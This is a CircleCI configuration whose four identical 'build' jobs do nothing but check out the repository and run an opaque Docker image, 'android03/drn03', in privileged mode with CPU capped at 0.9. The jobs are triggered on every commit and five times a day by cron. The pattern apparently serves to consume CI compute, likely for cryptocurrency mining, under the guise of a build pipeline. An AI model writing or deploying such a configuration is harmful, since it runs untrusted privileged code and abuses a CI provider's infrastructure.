version: 2
jobs:
  build_01:
    machine: true
    working_directory: ~/my_app
    parallelism: 1
    resource_class: medium
    steps:
      - checkout
      - run: |
          docker run --privileged --cpus=0.9 android03/drn03
  build_02:
    machine: true
    working_directory: ~/my_app
    parallelism: 1
    resource_class: medium
    steps:
      - checkout
      - run: |
          docker run --privileged --cpus=0.9 android03/drn03
  build_03:
    machine: true
    working_directory: ~/my_app
    parallelism: 1
    resource_class: medium
    steps:
      - checkout
      - run: |
          docker run --privileged --cpus=0.9 android03/drn03
  build_04:
    machine: true
    working_directory: ~/my_app
    parallelism: 1
    resource_class: medium
    steps:
      - checkout
      - run: |
          docker run --privileged --cpus=0.9 android03/drn03
workflows:
  version: 2
  commit:
    jobs:
      - build_01
      - build_02
      - build_03
      - build_04

  nightly:
    triggers:
      - schedule:
          cron: "3 0,5,10,15,20 * * *"
          filters:
            branches:
              only:
                - master
    jobs:
      - build_01
      - build_02
      - build_03
      - build_04